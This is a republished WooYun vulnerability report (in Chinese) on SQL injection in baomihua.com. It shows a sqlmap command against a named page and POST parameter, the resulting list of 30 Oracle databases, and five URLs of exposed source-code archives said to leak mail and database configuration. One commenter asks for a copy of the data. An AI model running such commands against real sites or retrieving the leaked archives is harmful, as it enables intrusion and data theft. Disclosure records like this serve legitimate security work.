爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

admin

139598
文章

114
评论

2017年4月2日01:24:57评论397 views字数 234阅读0分46秒阅读模式

摘要

2016-03-25：细节已通知厂商并且等待厂商处理中
2016-03-25：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-03-30：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(15) 关注此漏洞

缺陷编号： WooYun-2016-188855

漏洞标题：爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

漏洞作者：黑色键盘丶

提交时间： 2016-03-25 11:33

公开时间： 2016-03-30 11:40

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 18

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

code 区域

注入点：F:/sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs

数据库30个可裤裤查询

code 区域

back-end DBMS: Oracle
 available databases [30]:
 [*] APEX_030200
 [*] APPQOSSYS
 [*] CHEAT
 [*] CHENZH
 [*] CTXSYS
 [*] DBSNMP
 [*] EXFSYS
 [*] FLOWS_FILES
 [*] LIGZ
 [*] LINJS
 [*] MDSYS
 [*] OLAPSYS
 [*] ORDDATA
 [*] ORDSYS
 [*] OUTLN
 [*] OWBSYS
 [*] POMOHO
 [*] POMOHOMOBILE
 [*] QINYM
 [*] SCOTT
 [*] SYS
 [*] SYSMAN
 [*] SYSTEM
 [*] WMSYS
 [*] WUXG
 [*] XDB
 [*] XIAL
 [*] ZHANGXL
 [*] ZHAOLH
 [*] ZLY

当前库POMOHO 2449个表跑的实在太慢了2分钟一个表跑了2小时才几十个表估算一下要80个小时才可以跑完这里就证明下危害

数据库SYS也跑了下 976张表

数据库OLAPSYS 126张表

跑了几个数据量大的库证明下危害表的话要好几天就不深入了

还有几处源代码泄露的

code 区域

1：http://static.baomihua.com/doc.rar
 2：http://show.baomihua.com/baomihua.tar.gz
 3：http://resources.baomihua.com/swf.rar
 4：http://reg.baomihua.com/reg.rar
 5：http://pvstat.baomihua.com/wwwroot.rar

导致敏感信息泄露配置文件等等艾米直播网站的

邮箱服务器信息

数据库配置信息

这边没装打不开配置文件

漏洞证明：

code 区域

注入点：F:/sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs

数据库30个可裤裤查询

code 区域

back-end DBMS: Oracle
 available databases [30]:
 [*] APEX_030200
 [*] APPQOSSYS
 [*] CHEAT
 [*] CHENZH
 [*] CTXSYS
 [*] DBSNMP
 [*] EXFSYS
 [*] FLOWS_FILES
 [*] LIGZ
 [*] LINJS
 [*] MDSYS
 [*] OLAPSYS
 [*] ORDDATA
 [*] ORDSYS
 [*] OUTLN
 [*] OWBSYS
 [*] POMOHO
 [*] POMOHOMOBILE
 [*] QINYM
 [*] SCOTT
 [*] SYS
 [*] SYSMAN
 [*] SYSTEM
 [*] WMSYS
 [*] WUXG
 [*] XDB
 [*] XIAL
 [*] ZHANGXL
 [*] ZHAOLH
 [*] ZLY

当前库POMOHO 2449个表跑的实在太慢了2分钟一个表跑了2小时才几十个表估算一下要80个小时才可以跑完这里就证明下危害

数据库SYS也跑了下 976张表

数据库OLAPSYS 126张表

跑了几个数据量大的库证明下危害表的话要好几天就不深入了

还有几处源代码泄露的

code 区域

1：http://static.baomihua.com/doc.rar
 2：http://show.baomihua.com/baomihua.tar.gz
 3：http://resources.baomihua.com/swf.rar
 4：http://reg.baomihua.com/reg.rar
 5：http://pvstat.baomihua.com/wwwroot.rar

导致敏感信息泄露配置文件等等艾米直播网站的

邮箱服务器信息

数据库配置信息

这边没装打不开配置文件

修复方案：

过滤

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-03-30 11:40

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-25 18:44 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

1

要是有礼物就好啦嘿嘿

1# 回复此人
2016-03-25 21:08 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

1

我也找到了，

2# 回复此人
2016-03-25 21:13 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

1

@Pzacker o

3# 回复此人
2016-03-25 21:54 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

1

@黑色键盘丶你找的是参数是class等额吗

4# 回复此人
2016-03-25 22:03 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

1

是class的那个参数的吗。、。。

5# 回复此人
2016-03-25 22:09 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

1

@Pzacker 哪个

6# 回复此人
2016-03-30 20:20 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

1

厂商已经主动忽略漏洞，细节向公众公开说明无影响记得数据发我一份

7# 回复此人
2016-03-31 18:37 | ..%2fcorps%2f ( 路人 | Rank:16 漏洞数:4 | 普通白帽子 | Rank:642 漏洞数:263)

1

装逼啊小伙子

8# 回复此人

漏洞概要 关注数(15) 关注此漏洞

缺陷编号： WooYun-2016-188855

漏洞标题： 爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

相关厂商： 爆米花网

漏洞作者： 黑色键盘丶

提交时间： 2016-03-25 11:33

公开时间： 2016-03-30 11:40

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 18

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(15) 关注此漏洞

漏洞标题：爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

相关厂商：爆米花网

漏洞作者：黑色键盘丶

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签：注射技巧

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞评价(共0人评价):

登陆后才能进行评分